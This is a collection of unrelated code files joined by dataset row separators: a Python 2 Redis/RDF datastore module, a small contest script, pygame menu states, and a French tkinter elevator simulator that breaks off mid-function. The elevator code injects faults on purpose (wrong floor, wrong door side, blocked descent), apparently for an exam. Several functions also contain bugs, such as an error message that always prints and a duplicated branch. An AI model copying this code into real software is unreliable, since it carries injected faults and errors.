REDIS_HOST = config.REDIS_HOST
REDIS_PORT = config.REDIS_PORT
REDIS_DB = config.REDIS_DB
except ImportError:
REDIS_HOST = '127.0.0.1'
REDIS_PORT = 6379
REDIS_DB = 0
redis_server = redis.StrictRedis(host=REDIS_HOST,
port=REDIS_PORT,
db=REDIS_DB)
def create_key_from_url(raw_url):
"""
Function parses url, reverses the net location to create a value for use
as a Redis key.
:param raw_url: Raw url to extract key, required
:rtype: String
"""
org_url = urllib2.urlparse.urlparse(raw_url)
new_key = ''
net_location = org_url.netloc
netloc_list = net_location.split(".")
netloc_list.reverse()
for part in netloc_list:
new_key += '%s.' % part
new_key = new_key[:-1] # Removes trailing period
new_key = new_key + org_url.path
return new_key
def load_rdf_skos(redis_key,rdf_url):
"""
Loads skos:ConceptSchema coded in RDF from a URL
:param redis_key: Base Redis key
:param rdf_url: URL to RDF document
"""
raw_rdf = urllib2.urlopen(rdf_url).read()
skos_rdf = etree.XML(raw_rdf)
title_element = skos_rdf.find('{%s}ConceptScheme/{%s}title' %\
(ns.SKOS,ns.DC))
if title_element is None:
title = redis_key.title()
else:
title = title_element.text
redis_server.set('%s:title' % redis_key,title)
all_concepts = skos_rdf.findall('{%s}Concept' % ns.SKOS)
for concept in all_concepts:
label = concept.find('{%s}prefLabel' % ns.SKOS)
if label is not None:
if label.text != 'Published':
redis_server.sadd(redis_key,
label.text)
print("Added %s to %s" % (label.text,
redis_key))
redis_server.save()
def get_python_classname(raw_classname):
"""
Helper function creates valid Python class name for
dynamic class creation at runtime.
:param raw_classname: String from parsed data structure
:rtype string: Valid Python class name
"""
class_name = raw_classname.replace(" ","")
class_name = class_name.replace("-","")
return class_name
def load_dynamic_classes(rdf_url,redis_prefix,current_module):
"""
Function takes an URL to an RDF file, parses out and creates
classes based on the rdfs:Class element.
:param rdf_url: URL or file location to the RDF file
:param current_module: Current module
"""
ns_map = {'rdf':'http://www.w3.org/1999/02/22-rdf-syntax-ns#',
'rdfs':'http://www.w3.org/2000/01/rdf-schema#',
'xml':'http://www.w3.org/XML/1998/namespace'}
try:
raw_rdf = urllib2.urlopen(rdf_url).read()
except (urllib2.URLError,ValueError):
raw_rdf = open(rdf_url,"r").read()
finally:
print("Error %s loading %s" % (sys.exc_info(),
rdf_url))
rdf = etree.XML(raw_rdf)
all_classes = rdf.findall('{%s}Class' % ns.RDFS)
for rdf_class in all_classes:
rdf_ID = rdf_class.get("{%s}ID" % ns.RDF)
label = rdf_class.find("{%s}label[@{%s}lang='en']" %\
(ns.RDFS,
ns.XML))
parent_classes = rdf_class.findall("{%s}subClassOf" %\
ns.RDFS)
super_classes = []
for parent in parent_classes:
parent_id = parent.get("{%s}resource" % ns.RDF)
parent_id = parent_id.replace("#","")
parent = rdf.find("{%s}Class[@{%s}ID='%s']" %\
(ns.RDFS,
ns.RDF,
parent_id))
if parent is not None:
parent_label = parent.find("{%s}label[@{%s}lang='en']" %\
(ns.RDFS,
ns.XML))
super_classes.append(get_python_classname(parent_label.text))
if len(super_classes) < 1:
super_classes.append(object)
class_name = get_python_classname(label.text)
params = {'rdf_ID':rdf_ID,
'redis_key': '%s:%s' % (redis_prefix,
class_name)}
all_prop_xpath = "{%s}Property/{%s}range[@{%s}resource='#%s']" %\
(ns.RDF,
ns.RDFS,
ns.RDF,
rdf_ID)
all_ranges = rdf.findall(all_prop_xpath)
properties = []
for rdf_range in all_ranges:
rdf_property = rdf_range.getparent()
prop_name = rdf_property.find("{%s}label[@{%s}lang='en']" %\
(ns.RDFS,
ns.XML))
if prop_name is not None:
properties.append(prop_name.text)
## print("New class %s, properties %s" %\
## (class_name,properties))
new_class = type('%s' % class_name,
(BaseModel,),
params)
setattr(current_module,class_name,new_class)
def load_rda_classes(rda_frbr_file,
rda_rel_files,
redis_prefix,
current_module):
"""
RDA loading function, takes RDA RDF file and a RDA relationship file and
creates python classes with properties.
:param rda_frbr_file: FRBR entity RDA RDF file
:param rda_rel_files: List of RDA Properties RDF files
:param redis_prefix: Redis Prefix
:param current_moduel: Current module
"""
raw_rda_frbr = open(rda_frbr_file,'rb').read()
rda_frbr = etree.XML(raw_rda_frbr)
rda_rels_xml = []
for filename in rda_rel_files:
raw_rda_rel = open(filename,'rb').read()
rda_rel = etree.XML(raw_rda_rel)
rda_rels_xml.append(rda_rel)
all_desc = rda_frbr.findall("{%s}Description" % ns.RDF)
for desc in all_desc:
rda_url = desc.get('{%s}about' % ns.RDF)
all_properties = []
for rda_rel in rda_rels_xml:
rda_properties = rda_rel.findall('{%s}Description/{%s}domain[@{%s}resource="%s"]' % (ns.RDF,
ns.RDFS,
ns.RDF,
rda_url))
all_properties.extend(rda_properties)
reg_name = desc.find('{%s}name' % ns.REG)
if reg_name is not None:
class_name = reg_name.text
params = {'redis_key': '%s:%s' % (redis_prefix,
class_name)}
for prop in all_properties:
parent = prop.getparent()
name = parent.find('{%s}name' % ns.REG)
params[name.text] = None
#label = parent.find('{%s}label' % ns.RDFS)
#params[label.text] = None
#logging.error("Params = %s" % params)
new_class = type('%s' % class_name,
(BaseModel,),
params)
setattr(current_module,class_name,new_class)
class BaseModel(object):
"""
:class:`BaseModel` is a lightweight Python wrapper base class for
use by various modules in the FRBR Redis Datastore Project. This
class should not be used directly but should be extended by sub-classes
depending on its use.
"""
def __init__(self,**kwargs):
"""
Takes a key and optional Redis server and creates an instance
in the Redis datastore.
:param redis_key: Redis Key, required
:param redis_server: Redis server, if not present will be set the
default Redis server.
"""
if kwargs.has_key("redis_key"):
self.redis_key = kwargs.pop("redis_key")
if kwargs.has_key("redis_server"):
self.redis_server = kwargs.pop("redis_server")
else:
self.redis_server = redis_server
self.redis_ID = self.redis_server.incr("global:%s" % self.redis_key)
self.frbr_key = "%s:%s" % (self.redis_key,self.redis_ID)
for k,v in kwargs.iteritems():
if type(v) == list or type(v) == set:
new_key = "%s:%s" % (self.frbr_key,k)
for item in v:
self.redis_server.sadd(new_key,item)
self.redis_server.hset(self.frbr_key,k,new_key)
else:
self.redis_server.hset(self.frbr_key,k,v)
setattr(self,k,v)
def get_property(self,obj_property):
"""
Function tries to retrieve the property from the FRBR Redis
datastore.
:param obj_property: Required, name of the property
"""
return self.redis_server.hget(self.frbr_key,obj_property)
def get_or_set_property(self,obj_property,entity=None):
"""
Retrieves property. If entity, adds entity to set
for the self.frbr_key
:param obj_property: Required, name of the property
:param entity: Optional, an entity to add as a set if multiple
instances of :class:`BaseModel` property exists
"""
existing_properties = self.get_property(obj_property)
property_key = "%s:%s" % (self.frbr_key,obj_property)
if entity is not None:
if existing_properties is not None:
if self.redis_server.type(existing_properties) == set:
self.redis_server.sadd(property_key,
entity)
else:
# Remove property as a singleton and replace with
# a set, adding both existing and new entity
self.redis_server.hdel(self.frbr_key,obj_property)
property_set_key = "%s_set" % property_key
self.redis_server.sadd(property_set_key,existing_properties)
self.redis_server.sadd(property_set_key,entity)
self.redis_server.hset(self.frbr_key,obj_property,property_set_key)
return self.get_property(obj_property)
def set_property(self,obj_property,value):
"""
Method sets property to value. If obj_property already exists
and value is de-duped and turned into a set if needed.
:param obj_property: name of property
:param value: Value of property
"""
existing_properties = self.get_property(obj_property)
if existing_properties is None:
if type(value) == list:
if len(value) == 1:
self.redis_server.hset(self.frbr_key,
obj_property,
value[0])
else:
new_redis_key = "%s:%s" % (self.frbr_key,
obj_property)
for row in value:
self.redis_server.sadd(new_redis_key,
row)
self.redis_server.hset(self.frbr_key,
obj_property,
new_redis_key)
else:
self.redis_server.hset(self.frbr_key,
obj_property,
value)
|
991,467 | 94fd5a7782d14b44a979d33a444b3c0675d4e446 | import itertools
n,k = map(int,input().split())
ab = [0]*n
for i in range(n):
ab[i] = input().split()
a = []
b = []
for i in range(n):
tmp1 = int(ab[i][0])
tmp2 = int(ab[i][1])
a.append(tmp1)
b.append(tmp2)
ab = zip(a,b)
ab = sorted(ab)
a,b = zip(*ab)
s = 0
for i in range(n):
s += int(b[i])
if s >= k:
print(int(ab[i][0]))
exit() |
991,468 | 9ff030f2815a263074844d1cd74fce0d19d44b76 | import pygame as pg
from duchshund_walk import globals
from duchshund_walk.app_core import States
from duchshund_walk.messages import message_display
from duchshund_walk.settings import NICKNAME_MAX_LENGTH
from duchshund_walk.settings import WHITE
from duchshund_walk.settings import WORLD_HEIGH
from duchshund_walk.settings import WORLD_WIDTH
"""
Main loop
"""
class NameInput(States):
def __init__(self):
States.__init__(self)
self.next = "menu"
self.color = pg.Color("black")
self.FONT = pg.font.Font("freesansbold.ttf", 30)
self.rect = pg.Rect(WORLD_WIDTH / 2 - 250, WORLD_HEIGH / 2, 50, 50)
self.text = ""
self.txt_surface = self.FONT.render(self.text, True, self.color)
def startup(self):
print("starting Game state stuff")
def handle_enter_event(self):
if not self.text:
self.color = pg.Color("red")
return
globals.nickname = self.text
self.done = True
def get_event(self, event):
if event.type == pg.KEYDOWN:
if event.key == pg.K_RETURN:
self.handle_enter_event()
elif event.key == pg.K_BACKSPACE:
self.text = self.text[:-1]
else:
if len(self.text) != NICKNAME_MAX_LENGTH:
self.text += event.unicode
def update(self, screen):
self.draw(screen)
char_size = 10
box_width = max(50, self.txt_surface.get_width() + char_size)
self.rect.w = box_width
self.txt_surface = self.FONT.render(self.text, True, self.color)
def draw(self, screen):
screen.fill(WHITE)
screen.blit(self.txt_surface, (self.rect.x + 5, self.rect.y + 5))
text_surface = self.FONT.render("Input your nickname", True, self.color)
rect = text_surface.get_rect()
rect.center = (WORLD_WIDTH / 2 - 50, WORLD_HEIGH / 2 - 50)
screen.blit(text_surface, rect)
pg.draw.rect(screen, self.color, self.rect, 2)
def __str__(self):
return "NameInput"
class AboutAuthor(States):
def __init__(self):
States.__init__(self)
self.next = "details"
def startup(self):
print("state with author")
def get_event(self, event):
if event.type == pg.KEYDOWN:
self.done = True
elif event.type == pg.MOUSEBUTTONDOWN:
self.done = True
def update(self, screen):
self.draw(screen)
message_display(screen, "@noemiko", "https://github.com/noemiko ")
def draw(self, screen):
screen.fill(WHITE)
class WorkInProgress(States):
def __init__(self):
States.__init__(self)
self.next = "menu"
def startup(self):
print("starting WIP state stuff")
def get_event(self, event):
if event.type == pg.KEYDOWN:
self.done = True
elif event.type == pg.MOUSEBUTTONDOWN:
self.done = True
def update(self, screen):
self.draw(screen)
message_display(screen, "TODO", "todo " + globals.nickname)
def draw(self, screen):
screen.fill(WHITE)
|
991,469 | 4b615ac16099f42be5d47203fc43e4d46e82b8de | #!/opt/local/bin/python
import tkinter as tk
import tkinter.ttk as ttk
import sys
from random import randint
import threading
globstop = 0
mauvaisetage = False
portes_ouvertes = 0 # à 1 les portes sont complétement ouvertes, à 0 elles sont fermées
portes_bloquees = False
PORTES_UN_PEU_OUVERTES = 0.5 # à quelle proportion les portes s'ouvrent lorsqu'on clique sur le bouton associé
AUTORISATION_PORTES_OUVERTES = 0.0025 # on considère que les portes s'ouvrent sur 2m, on autorise une ouverture de 0.0025% de 2m qui font 5mm
bouge_portes_ouvertes = False
mauvaisePorte = False
curMouvement='0'
CurTempo = 0
class MyTimer:
global globstop
def __init__(self, tempo, target, args=None, kwargs=None):
if kwargs is None:
kwargs = {}
if args is None:
args = []
self._target = target
self._args = args
self._kwargs = kwargs
self._tempo = tempo
def _run(self):
if globstop:
sys.exit()
self._timer = threading.Timer(self._tempo, self._run)
self._timer.start()
self._target(*self._args, **self._kwargs)
def start(self):
self._timer = threading.Timer(self._tempo, self._run)
self._timer.start()
def stop(self):
self._timer.cancel()
class descente_impossible():
def __init__(self):
self.activation = "disable"
def activate(self):
self.activation = "enable"
#print('activée')
def desactivate(self):
self.activation = "disable"
#print('desactivée')
def status(self):
return self.activation
class defaillance(descente_impossible):
def __init__(self, master, descente_impossible):
self.master = master
self.frame = tk.Frame(self.master)
self.master.geometry('200x200')
self.master.title('Défaillance')
self.buttonDesactivation = tk.Button(self.frame, text='Désactiver descente',command=descente_impossible.activate)
self.buttonDesactivation.pack()
self.buttonActivation = tk.Button(self.frame, text='Activer descente',command=descente_impossible.desactivate)
self.buttonActivation.pack()
self.frame.pack()
descente_impossible = descente_impossible()
class Lift():
global portes_ouvertes, portes_bloquees, curMouvement
global descente_impossible
def __init__(self, master):
self.master = master
self.frame = tk.Frame(self.master)
self.master.geometry('200x200')
self.master.title('ascenseur')
self.CreerEtage()
self.CreerElevator()
self.CreerLouis()
self.CreerPortes()
self.buttonA = tk.Button(self.frame, text='Alarm')
self.buttonA.pack()
self.button5 = tk.Button(self.frame, text='5', command=self.Aller5)
self.button5.pack()
self.button4 = tk.Button(self.frame, text='4', command=self.Aller4)
self.button4.pack()
self.button3 = tk.Button(self.frame, text='3', command=self.Aller3)
self.button3.pack()
self.button2 = tk.Button(self.frame, text='2', command=self.Aller2)
self.button2.pack()
self.button1 = tk.Button(self.frame, text='1', command=self.Aller1)
self.button1.pack()
self.frame.pack()
self.CurEtage = 1
self.target = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
self.CurPos = 0
self.CurServed = 0
self.UpdateColor()
def Aller5(self):
if mauvaisetage:
target=4
else:
target=5
if descente_impossible.status() == "enable":
if self.CurEtage <= 5:
self.target[self.CurPos] = target
self.ordrePriorite()
self.CurPos = self.CurPos + 1
if self.CurPos == 10:
self.CurPos = 0
else:
if self.CurPos < 10:
self.target[self.CurPos] = target
self.ordrePriorite()
self.CurPos = self.CurPos + 1
if self.CurPos == 10:
self.CurPos = 0
def Aller4(self):
if mauvaisetage:
target=3
else:
target=4
if descente_impossible.status() == "enable":
#print(self.CurEtage, self.target[self.CurPos])
if self.CurEtage <= 4:
self.target[self.CurPos] = target
self.ordrePriorite()
self.CurPos = self.CurPos + 1
if self.CurPos == 10:
self.CurPos = 0
else:
if self.CurPos < 10:
self.target[self.CurPos] = target
self.ordrePriorite()
self.CurPos = self.CurPos + 1
if self.CurPos == 10:
self.CurPos = 0
def Aller3(self):
if mauvaisetage:
target=2
else:
target=3
if descente_impossible.status() == "enable":
#print(self.CurEtage, self.target[self.CurPos])
if self.CurEtage <= 3:
self.target[self.CurPos] = target
self.ordrePriorite()
self.CurPos = self.CurPos + 1
if self.CurPos == 10:
self.CurPos = 0
else:
if self.CurPos < 10:
self.target[self.CurPos] = target
self.ordrePriorite()
self.CurPos = self.CurPos + 1
if self.CurPos == 10:
self.CurPos = 0
def Aller2(self):
if mauvaisetage:
target=1
else:
target=2
if descente_impossible.status() == "enable":
#print(self.CurEtage, self.target[self.CurPos])
if self.CurEtage <= 2:
self.target[self.CurPos] = target
self.ordrePriorite()
self.CurPos = self.CurPos + 1
if self.CurPos == 10:
self.CurPos = 0
else:
if self.CurPos < 10:
self.target[self.CurPos] = target
self.ordrePriorite()
self.CurPos = self.CurPos + 1
if self.CurPos == 10:
self.CurPos = 0
def Aller1(self):
if mauvaisetage:
target=5
else:
target=1
if descente_impossible.status() == "enable":
#print(self.CurEtage, self.target[self.CurPos])
if self.CurEtage <= 1:
self.target[self.CurPos] = target
self.ordrePriorite()
self.CurPos = self.CurPos + 1
if self.CurPos == 10:
self.CurPos = 0
else:
if self.CurPos < 10:
self.target[self.CurPos] = target
self.ordrePriorite()
self.CurPos = self.CurPos + 1
if self.CurPos == 10:
self.CurPos = 0
def ordrePriorite(self):
# print((self.CurServed + 1) % 10)
# print(self.target)
# print(range(min(self.CurEtage, self.target[self.CurServed]), max(self.CurEtage, self.target[self.CurServed])))
if self.target[(self.CurServed + 1) % 10] in range(min(self.CurEtage, self.target[self.CurServed]), max(self.CurEtage, self.target[self.CurServed])):
self.target[(self.CurServed + 1) % 10], self.target[self.CurServed] = self.target[self.CurServed], self.target[(self.CurServed + 1) % 10]
i=self.CurServed
while(i!=self.CurPos):
if self.target[(i + 2) % 10] in range(min(self.target[i], self.target[(i + 1) % 10]),max(self.target[i], self.target[(i + 1) % 10])):
self.target[(i + 2) % 10], self.target[(i + 1) % 10] = self.target[(i + 1) % 10], self.target[(i + 2) % 10]
i = (i + 1) % 10
def CreerEtage(self):
self.newWindow = tk.Toplevel(self.master)
self.Etages = Etages(self.newWindow, self)
def CreerPortes(self):
self.newWindow = tk.Toplevel(self.master)
self.Etages = Double_porte_Elio(self.newWindow)
def CreerElevator(self):
self.newWindow = tk.Toplevel(self.master)
self.Elevator = Elevator(self.newWindow)
def CreerLouis(self):
self.newWindow = tk.Toplevel(self.master)
self.DefaillanceLouis = Defaillance_Louis_Eloise_Jules(self.newWindow,self.Elevator,descente_impossible)
# def CreerDefaillance(self):
# self.newWindow = tk.Toplevel(self.master)
# self.defaillance = defaillance(self.newWindow, descente_impossible)
def move(self):
global portes_ouvertes, bouge_portes_ouvertes, curMouvement, CurTempo
if portes_bloquees == False:
self.UpdateColor()
else:
if portes_ouvertes < AUTORISATION_PORTES_OUVERTES:
self.doorRed()
else:
self.doorGreen()
# comment out for exam
#print("curMouvement "+curMouvement)
#print("curEtage ",self.CurEtage)
#print("CurTempo"+self.CurTempo)
#print("CurPos: ",self.CurPos," / CurServed: ", self.CurServed)
#print("target ",self.target)
if self.CurEtage > 5:
self.CurEtage = 5
curMouvement = '0'
if self.CurEtage < 1:
self.CurEtage = 1
curMouvement = '0'
# if curMouvement == '+' or curMouvement == '-' or curMouvement == 'p':
CurTempo = CurTempo + 1
if CurTempo == 50 or CurTempo == 0: # permet de donner une notion de temps entre les etages
#print("curMouvement " + curMouvement)
#print("curEtage ", self.CurEtage)
# print("CurTempo"+self.CurTempo)
#print("CurPos: ", self.CurPos, " / CurServed: ", self.CurServed)
#print("target ", self.target)
# if curMouvement == 'p' and self.CurTempo == 50:
# curMouvement = '0'
if curMouvement == '0':
if self.target[self.CurServed] > 0:
if self.CurEtage < self.target[self.CurServed]:
curMouvement = '+'
if portes_bloquees==False:
self.UpdateColor()
if self.CurEtage > self.target[self.CurServed]:
curMouvement = '-'
if portes_bloquees == False:
self.UpdateColor()
if self.target[self.CurServed] == self.CurEtage:
self.CurServed = self.CurServed + 1
if self.CurServed == 10:
self.CurServed = 0
if portes_ouvertes < AUTORISATION_PORTES_OUVERTES or bouge_portes_ouvertes == True:
if curMouvement == 'p':
if self.target[self.CurServed] > 0:
if self.CurEtage < self.target[self.CurServed]:
curMouvement = '+'
if portes_bloquees == False:
self.UpdateColor()
if self.CurEtage > self.target[self.CurServed]:
curMouvement = '-'
if portes_bloquees == False:
self.UpdateColor()
if self.target[self.CurServed] == self.CurEtage:
self.CurServed = self.CurServed + 1
if self.CurServed == 10:
self.CurServed = 0
if curMouvement == '+':
self.CurEtage = self.CurEtage + 1
if self.CurEtage == self.target[self.CurServed]:
curMouvement = 'p'
self.target[self.CurServed] = 0
self.CurServed = self.CurServed + 1
if self.CurServed == 10:
self.CurServed = 0
# self.target[self.CurPos] = randint(0, 5) #pas compris cette ligne
# if descente_impossible.status() == "enable":
# self.curMouvement = '0'
# else:
if curMouvement == '-':
self.CurEtage = self.CurEtage - 1
if self.CurEtage == self.target[self.CurServed]:
curMouvement = 'p'
self.target[self.CurServed] = 0
self.CurServed = self.CurServed + 1
if self.CurServed == 10:
self.CurServed = 0
# self.target[self.CurServed] = randint(0, 5) #pas compris cette ligne
if portes_bloquees == False:
self.UpdateColor()
else:
if portes_ouvertes<AUTORISATION_PORTES_OUVERTES:
self.doorRed()
else:
self.doorGreen()
CurTempo = 0
def UpdateColor(self):
global portes_ouvertes, portes_bloquees,curEtage,curMouvement, CurTempo
curEtage=self.CurEtage
# print "UpdateColor", curMouvement, self.CurEtage
self.Elevator.check_Changes()
if curMouvement == '0':
if portes_bloquees==False:
portes_ouvertes=0
self.doorRed()
elif curMouvement == 'p':
if portes_bloquees==False:
portes_ouvertes=1
self.doorGreen()
statut = portes[self.CurEtage - 1]
if mauvaisePorte == True:
if statut == 0:
statut = 1
else:
statut = 0
self.Elevator.Door_To_Green(self.CurEtage, statut)
elif curMouvement == '+':
if portes_bloquees==False:
portes_ouvertes=0
if self.CurEtage == 1:
self.Elevator.orange1()
self.Elevator.bleu2()
self.Elevator.noir3()
self.Elevator.noir4()
self.Elevator.noir5()
elif self.CurEtage == 2:
self.Elevator.noir1()
self.Elevator.orange2()
self.Elevator.bleu3()
self.Elevator.noir4()
self.Elevator.noir5()
elif self.CurEtage == 3:
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.orange3()
self.Elevator.bleu4()
self.Elevator.noir5()
elif self.CurEtage == 4:
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.noir3()
self.Elevator.orange4()
self.Elevator.bleu5()
# print(self.CurEtage)
statut = portes[self.CurEtage - 1]
if mauvaisePorte == True:
if statut == 0:
statut = 1
else:
statut = 0
self.Elevator.Door_To_Red(self.CurEtage, statut)
elif curMouvement == '-':
if portes_bloquees==False:
portes_ouvertes=0
if self.CurEtage == 2:
if descente_impossible.status() == "enable":
self.Elevator.noir1()
self.Elevator.rouge2()
self.Elevator.noir3()
self.Elevator.noir4()
self.Elevator.noir5()
else:
self.Elevator.bleu1()
self.Elevator.orange2()
self.Elevator.noir3()
self.Elevator.noir4()
self.Elevator.noir5()
if self.CurEtage == 3:
if descente_impossible.status() == "enable":
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.rouge3()
self.Elevator.noir4()
self.Elevator.noir5()
else:
self.Elevator.noir1()
self.Elevator.bleu2()
self.Elevator.orange3()
self.Elevator.noir4()
self.Elevator.noir5()
if self.CurEtage == 4:
if descente_impossible.status() == "enable":
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.noir3()
self.Elevator.rouge4()
self.Elevator.noir5()
else:
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.bleu3()
self.Elevator.orange4()
self.Elevator.noir5()
if self.CurEtage == 5:
if descente_impossible.status() == "enable":
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.noir3()
self.Elevator.noir4()
self.Elevator.rouge5()
else:
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.noir3()
self.Elevator.bleu4()
self.Elevator.orange5()
statut = portes[self.CurEtage - 1]
if mauvaisePorte == True:
if statut == 0:
statut = 1
else:
statut = 0
self.Elevator.Door_To_Red(self.CurEtage, statut)
def doorGreen(self):
global curMouvement
if self.CurEtage == 1:
self.Elevator.vert1()
self.Elevator.noir2()
self.Elevator.noir3()
self.Elevator.noir4()
self.Elevator.noir5()
elif self.CurEtage == 2:
self.Elevator.noir1()
self.Elevator.vert2()
self.Elevator.noir3()
self.Elevator.noir4()
self.Elevator.noir5()
elif self.CurEtage == 3:
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.vert3()
self.Elevator.noir4()
self.Elevator.noir5()
elif self.CurEtage == 4:
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.noir3()
self.Elevator.vert4()
self.Elevator.noir5()
elif self.CurEtage == 5:
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.noir3()
self.Elevator.noir4()
self.Elevator.vert5()
if (portes_ouvertes >= AUTORISATION_PORTES_OUVERTES and bouge_portes_ouvertes == False and (
CurTempo == 25 or CurTempo == 75)):
curMouvement = '0'
def doorRed(self):
if self.CurEtage == 1:
self.Elevator.rouge1()
self.Elevator.noir2()
self.Elevator.noir3()
self.Elevator.noir4()
self.Elevator.noir5()
elif self.CurEtage == 2:
self.Elevator.noir1()
self.Elevator.rouge2()
self.Elevator.noir3()
self.Elevator.noir4()
self.Elevator.noir5()
elif self.CurEtage == 3:
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.rouge3()
self.Elevator.noir4()
self.Elevator.noir5()
elif self.CurEtage == 4:
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.noir3()
self.Elevator.rouge4()
self.Elevator.noir5()
elif self.CurEtage == 5:
self.Elevator.noir1()
self.Elevator.noir2()
self.Elevator.noir3()
self.Elevator.noir4()
self.Elevator.rouge5()
statut = portes[self.CurEtage - 1]
if mauvaisePorte == True:
if statut == 0:
statut = 1
else:
statut = 0
self.Elevator.Door_To_Red(self.CurEtage, statut)
def sortir(self):
global globstop
globstop = 1
sys.exit(1)
class Etages(Lift):
def __init__(self, master, Lift):
self.master = master
self.frame = tk.Frame(self.master)
self.master.geometry('200x200')
self.master.title('Etages')
self.button5u = tk.Button(self.frame, text='5 ^', command=Lift.Aller5)
self.button5u.pack()
self.button5d = tk.Button(self.frame, text='5 v', command=Lift.Aller5)
self.button5d.pack()
self.button4u = tk.Button(self.frame, text='4 ^', command=Lift.Aller4)
self.button4u.pack()
self.button4d = tk.Button(self.frame, text='4 v', command=Lift.Aller4)
self.button4d.pack()
self.button3u = tk.Button(self.frame, text='3 ^', command=Lift.Aller3)
self.button3u.pack()
self.button3d = tk.Button(self.frame, text='3 v', command=Lift.Aller3)
self.button3d.pack()
self.button2u = tk.Button(self.frame, text='2 ^', command=Lift.Aller2)
self.button2u.pack()
self.button2d = tk.Button(self.frame, text='2 v', command=Lift.Aller2)
self.button2d.pack()
self.button1u = tk.Button(self.frame, text='1 ^', command=Lift.Aller1)
self.button1u.pack()
self.button1d = tk.Button(self.frame, text='1 v', command=Lift.Aller1)
self.button1d.pack()
self.master.geometry("+200+200")
self.frame.pack()
def close_windows(self):
self.master.destroy()
class Elevator:
def __init__(self, master):
self.master = master
self.frame = tk.Frame(self.master)
self.master.geometry('200x200')
self.master.title('Position')
style = ttk.Style()
style.configure("TButton", padding=(0, 5, 0, 5))
style.configure("Red.TButton", foreground='red')
style.configure("Blue.TButton", foreground='blue')
style.configure("Green.TButton", foreground='green')
style.configure("Orange.TButton", foreground='orange')
style.configure("Black.Tbutton", foreground='black')
# ----------------------(Buttons 5)---------------------- #
self.frame5 = tk.Frame(self.frame)
self.button5 = ttk.Button(self.frame5, text='#_5_#')
self.button5_back = ttk.Button(self.frame5, text='B5')
self.button5_front = ttk.Button(self.frame5, text='F5')
self.button5_back.pack(side=tk.LEFT)
self.button5_front.pack(side=tk.RIGHT)
self.button5.pack(side=tk.RIGHT)
self.button5.configure(style="Red.TButton")
self.frame5.pack(expand=True)
# ----------------------(Buttons 4)---------------------- #
self.frame4 = tk.Frame(self.frame)
self.button4 = ttk.Button(self.frame4, text='#_4_#')
self.button4_back = ttk.Button(self.frame4, text='B4')
self.button4_front = ttk.Button(self.frame4, text='F4')
self.button4_back.pack(side=tk.LEFT)
self.button4_front.pack(side=tk.RIGHT)
self.button4.pack(side=tk.RIGHT)
self.button4.configure(style="Blue.TButton")
self.frame4.pack(expand=True)
# ----------------------(Buttons 3)---------------------- #
self.frame3 = tk.Frame(self.frame)
self.button3 = ttk.Button(self.frame3, text='#_3_#')
self.button3_back = ttk.Button(self.frame3, text='B3')
self.button3_front = ttk.Button(self.frame3, text='F3')
self.button3_back.pack(side=tk.LEFT)
self.button3_front.pack(side=tk.RIGHT)
self.button3.pack(side=tk.RIGHT)
self.button3.configure(style="Green.TButton")
self.frame3.pack(expand=True)
# ----------------------(Buttons 2)---------------------- #
self.frame2 = tk.Frame(self.frame)
self.button2 = ttk.Button(self.frame2, text='#_2_#')
self.button2_back = ttk.Button(self.frame2, text='B2')
self.button2_front = ttk.Button(self.frame2, text='F2')
self.button2_back.pack(side=tk.LEFT)
self.button2_front.pack(side=tk.RIGHT)
self.button2.pack(side=tk.RIGHT)
self.button2.configure(style="Orange.TButton")
self.frame2.pack(expand=True)
# ----------------------(Buttons 1)---------------------- #
self.frame1 = tk.Frame(self.frame)
self.button1 = ttk.Button(self.frame1, text='#_1_#')
self.button1_back = ttk.Button(self.frame1, text='B1')
self.button1_front = ttk.Button(self.frame1, text='F1')
self.button1.configure(style="Black.TButton")
self.button1_back.pack(side=tk.LEFT)
self.button1_front.pack(side=tk.RIGHT)
self.button1.pack(side=tk.RIGHT)
self.frame1.pack(expand=True)
self.master.geometry("+400+200")
self.frame.pack()
def rouge5(self):
self.button5.configure(style="Red.TButton")
self.button5.pack()
def bleu5(self):
self.button5.configure(style="Blue.TButton")
self.button5.pack()
def vert5(self):
self.button5.configure(style="Green.TButton")
self.button5.pack()
def orange5(self):
self.button5.configure(style="Orange.TButton")
self.button5.pack()
def noir5(self):
self.button5.configure(style="Black.TButton")
self.button5.pack()
def rouge4(self):
self.button4.configure(style="Red.TButton")
self.button4.pack()
def bleu4(self):
self.button4.configure(style="Blue.TButton")
self.button4.pack()
def vert4(self):
self.button4.configure(style="Green.TButton")
self.button4.pack()
def orange4(self):
self.button4.configure(style="Orange.TButton")
self.button4.pack()
def noir4(self):
self.button4.configure(style="Black.TButton")
self.button4.pack()
def rouge3(self):
self.button3.configure(style="Red.TButton")
self.button3.pack()
def bleu3(self):
self.button3.configure(style="Blue.TButton")
self.button3.pack()
def vert3(self):
self.button3.configure(style="Green.TButton")
self.button3.pack()
def orange3(self):
self.button3.configure(style="Orange.TButton")
self.button3.pack()
def noir3(self):
self.button3.configure(style="Black.TButton")
self.button3.pack()
def rouge2(self):
self.button2.configure(style="Red.TButton")
self.button2.pack()
def bleu2(self):
self.button2.configure(style="Blue.TButton")
self.button2.pack()
def vert2(self):
self.button2.configure(style="Green.TButton")
self.button2.pack()
def orange2(self):
self.button2.configure(style="Orange.TButton")
self.button2.pack()
def noir2(self):
self.button2.configure(style="Black.TButton")
self.button2.pack()
def rouge1(self):
self.button1.configure(style="Red.TButton")
self.button1.pack()
def bleu1(self):
self.button1.configure(style="Blue.TButton")
self.button1.pack()
def vert1(self):
self.button1.configure(style="Green.TButton")
self.button1.pack()
def orange1(self):
self.button1.configure(style="Orange.TButton")
self.button1.pack()
def noir1(self):
self.button1.configure(style="Black.TButton")
self.button1.pack()
def Door_To_Green(self,etage,statut):
if statut == 0 :
if etage == 1:
self.button1_back.configure(style="chosen.TButton")
elif etage == 2 :
self.button2_back.configure(style="chosen.TButton")
elif etage == 3 :
self.button3_back.configure(style="chosen.TButton")
elif etage == 3 :
